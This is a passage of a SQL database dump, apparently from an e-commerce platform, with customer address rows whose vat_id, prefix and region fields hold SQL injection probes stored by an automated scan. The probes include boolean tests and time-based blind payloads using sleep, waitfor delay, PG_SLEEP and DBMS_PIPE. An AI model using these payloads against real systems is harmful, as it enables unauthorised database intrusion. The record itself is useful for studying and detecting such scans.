(132, NULL, 116, '2026-01-02 07:10:33', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(133, NULL, 116, '2026-01-02 07:10:34', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1 OR 5*5=25 -- ', NULL, NULL, NULL, NULL),
(134, NULL, 116, '2026-01-02 07:10:35', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1 OR 5*5=26 -- ', NULL, NULL, NULL, NULL),
(135, NULL, 116, '2026-01-02 07:10:35', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1 OR 5*5=25', NULL, NULL, NULL, NULL),
(136, NULL, 116, '2026-01-02 07:10:36', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1 OR 5*5=26', NULL, NULL, NULL, NULL),
(137, NULL, 116, '2026-01-02 07:10:37', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\' OR 5*5=25 -- ', NULL, NULL, NULL, NULL),
(138, NULL, 116, '2026-01-02 07:10:38', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\' OR 5*5=26 -- ', NULL, NULL, NULL, NULL),
(139, NULL, 116, '2026-01-02 07:10:38', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\" OR 5*5=25 -- ', NULL, NULL, NULL, NULL),
(140, NULL, 116, '2026-01-02 07:10:39', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\" OR 5*5=26 -- ', NULL, NULL, NULL, NULL),
(141, NULL, 116, '2026-01-02 07:10:40', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\' OR 5*5=25 or \'Sm5X4d8X\'=\'', NULL, NULL, NULL, NULL),
(142, NULL, 116, '2026-01-02 07:10:41', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\' OR 5*5=26 or \'Sm5X4d8X\'=\'', NULL, NULL, NULL, NULL),
(143, NULL, 116, '2026-01-02 07:10:41', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\" OR 5*5=25 or \"brcVQOpG\"=\"', NULL, NULL, NULL, NULL),
(144, NULL, 116, '2026-01-02 07:10:42', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '-1\" OR 5*5=26 or \"brcVQOpG\"=\"', NULL, NULL, NULL, NULL),
(145, NULL, 116, '2026-01-02 07:10:47', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1*if(now()=sysdate(),sleep(15),0)', NULL, NULL, NULL, NULL),
(146, NULL, 116, '2026-01-02 07:10:52', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '10\'XOR(1*if(now()=sysdate(),sleep(15),0))XOR\'Z', NULL, NULL, NULL, NULL),
(147, NULL, 116, '2026-01-02 07:10:57', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '10\"XOR(1*if(now()=sysdate(),sleep(15),0))XOR\"Z', NULL, NULL, NULL, NULL),
(148, NULL, 116, '2026-01-02 07:11:01', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', NULL, NULL, NULL, NULL),
(149, NULL, 116, '2026-01-02 07:11:07', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1; waitfor delay \'0:0:15\' -- ', NULL, NULL, NULL, NULL),
(150, NULL, 116, '2026-01-02 07:11:12', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1); waitfor delay \'0:0:15\' -- ', NULL, NULL, NULL, NULL),
(151, NULL, 116, '2026-01-02 07:11:17', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1 waitfor delay \'0:0:15\' -- ', NULL, NULL, NULL, NULL),
(152, NULL, 116, '2026-01-02 07:11:22', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1TJvlgMml\'; waitfor delay \'0:0:15\' -- ', NULL, NULL, NULL, NULL),
(153, NULL, 116, '2026-01-02 07:11:27', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1 OR 127=(SELECT 127 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(154, NULL, 116, '2026-01-02 07:11:32', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1) OR 616=(SELECT 616 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(155, NULL, 116, '2026-01-02 07:11:37', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1-1)) OR 751=(SELECT 751 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(156, NULL, 116, '2026-01-02 07:11:42', '2026-01-02 07:42:13', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1GAokuVAP\' OR 32=(SELECT 32 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(157, NULL, 116, '2026-01-02 07:11:46', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1gO1f2XqD\') OR 369=(SELECT 369 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(158, NULL, 116, '2026-01-02 07:11:51', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1W05VPg0W\')) OR 73=(SELECT 73 FROM PG_SLEEP(15))--', NULL, NULL, NULL, NULL),
(159, NULL, 116, '2026-01-02 07:11:56', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)', NULL, NULL, NULL, NULL),
(160, NULL, 116, '2026-01-02 07:12:01', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', NULL, NULL, NULL, NULL),
(161, NULL, 116, '2026-01-02 07:12:07', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)', NULL, NULL, NULL, NULL),
(162, NULL, 116, '2026-01-02 07:12:07', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(163, NULL, 116, '2026-01-02 07:12:08', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1\'\"', NULL, NULL, NULL, NULL),
(164, NULL, 116, '2026-01-02 07:12:09', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '@@Rw8qM', NULL, NULL, NULL, NULL),
(165, NULL, 116, '2026-01-02 07:12:10', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '(select 198766*667891)', NULL, NULL, NULL, NULL),
(166, NULL, 116, '2026-01-02 07:12:11', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '(select 198766*667891 from DUAL)', NULL, NULL, NULL, NULL),
(167, NULL, 116, '2026-01-02 07:12:15', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(168, NULL, 116, '2026-01-02 07:12:21', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(169, NULL, 116, '2026-01-02 07:12:22', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1 OR 5*5=25 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(170, NULL, 116, '2026-01-02 07:12:22', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1 OR 5*5=26 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(171, NULL, 116, '2026-01-02 07:12:23', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1 OR 5*5=25', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(172, NULL, 116, '2026-01-02 07:12:24', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1 OR 5*5=26', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(173, NULL, 116, '2026-01-02 07:12:25', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\' OR 5*5=25 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(174, NULL, 116, '2026-01-02 07:12:25', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\' OR 5*5=26 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(175, NULL, 116, '2026-01-02 07:12:26', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\" OR 5*5=25 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(176, NULL, 116, '2026-01-02 07:12:27', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\" OR 5*5=26 -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(177, NULL, 116, '2026-01-02 07:12:28', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\' OR 5*5=25 or \'2pb69HSL\'=\'', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(178, NULL, 116, '2026-01-02 07:12:28', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\' OR 5*5=26 or \'2pb69HSL\'=\'', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(179, NULL, 116, '2026-01-02 07:12:29', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\" OR 5*5=25 or \"g7dqfeAl\"=\"', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(180, NULL, 116, '2026-01-02 07:12:30', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '-1\" OR 5*5=26 or \"g7dqfeAl\"=\"', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(181, NULL, 116, '2026-01-02 07:12:34', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317*if(now()=sysdate(),sleep(15),0)', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(182, NULL, 116, '2026-01-02 07:12:40', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '3170\'XOR(317*if(now()=sysdate(),sleep(15', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(183, NULL, 116, '2026-01-02 07:12:44', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '3170\"XOR(317*if(now()=sysdate(),sleep(15', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(184, NULL, 116, '2026-01-02 07:12:48', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '(select(0)from(select(sleep(15)))v)/*\'+(', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(185, NULL, 116, '2026-01-02 07:12:54', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1; waitfor delay \'0:0:15\' -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(186, NULL, 116, '2026-01-02 07:12:59', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1); waitfor delay \'0:0:15\' -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(187, NULL, 116, '2026-01-02 07:13:03', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1 waitfor delay \'0:0:15\' -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(188, NULL, 116, '2026-01-02 07:13:09', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '3174PgW6hQt\'; waitfor delay \'0:0:15\' -- ', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(189, NULL, 116, '2026-01-02 07:13:13', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1 OR 896=(SELECT 896 FROM PG_SLEEP(1', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(190, NULL, 116, '2026-01-02 07:13:18', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1) OR 620=(SELECT 620 FROM PG_SLEEP(', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(191, NULL, 116, '2026-01-02 07:13:23', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317-1)) OR 80=(SELECT 80 FROM PG_SLEEP(1', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(192, NULL, 116, '2026-01-02 07:13:28', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317pTqMyUDx\' OR 823=(SELECT 823 FROM PG_', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(193, NULL, 116, '2026-01-02 07:13:33', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '3179Eksq8JA\') OR 716=(SELECT 716 FROM PG', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(194, NULL, 116, '2026-01-02 07:13:38', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317q5OtqqNO\')) OR 15=(SELECT 15 FROM PG_', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(195, NULL, 116, '2026-01-02 07:13:43', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||C', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(196, NULL, 116, '2026-01-02 07:13:48', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)|', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(197, NULL, 116, '2026-01-02 07:13:52', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(198, NULL, 116, '2026-01-02 07:13:53', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(199, NULL, 116, '2026-01-02 07:13:54', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317\'\"', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL);
INSERT INTO `customer_address_entity` (`entity_id`, `increment_id`, `parent_id`, `created_at`, `updated_at`, `is_active`, `city`, `company`, `country_id`, `fax`, `firstname`, `lastname`, `middlename`, `postcode`, `prefix`, `region`, `region_id`, `street`, `suffix`, `telephone`, `vat_id`, `vat_is_valid`, `vat_request_date`, `vat_request_id`, `vat_request_success`) VALUES
(200, NULL, 116, '2026-01-02 07:13:55', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '@@UM0Cn', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(201, NULL, 116, '2026-01-02 07:13:56', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '(select 198766*667891)', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(202, NULL, 116, '2026-01-02 07:13:56', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '(select 198766*667891 from DUAL)', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(203, NULL, 116, '2026-01-02 07:14:01', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(204, NULL, 116, '2026-01-02 07:14:07', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(205, NULL, 116, '2026-01-02 07:14:08', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1 OR 5*5=25 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(206, NULL, 116, '2026-01-02 07:14:09', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1 OR 5*5=26 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(207, NULL, 116, '2026-01-02 07:14:09', '2026-01-02 07:42:14', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1 OR 5*5=25', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(208, NULL, 116, '2026-01-02 07:14:10', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1 OR 5*5=26', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(209, NULL, 116, '2026-01-02 07:14:11', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\' OR 5*5=25 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(210, NULL, 116, '2026-01-02 07:14:11', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\' OR 5*5=26 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(211, NULL, 116, '2026-01-02 07:14:12', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\" OR 5*5=25 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(212, NULL, 116, '2026-01-02 07:14:13', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\" OR 5*5=26 -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(213, NULL, 116, '2026-01-02 07:14:14', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\' OR 5*5=25 or \'U5HzgTgS\'=\'', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(214, NULL, 116, '2026-01-02 07:14:14', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\' OR 5*5=26 or \'U5HzgTgS\'=\'', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(215, NULL, 116, '2026-01-02 07:14:15', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\" OR 5*5=25 or \"c2lLL6A7\"=\"', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(216, NULL, 116, '2026-01-02 07:14:16', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '-1\" OR 5*5=26 or \"c2lLL6A7\"=\"', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(217, NULL, 116, '2026-01-02 07:14:21', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'if(now()=sysdate(),sleep(15),0)', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
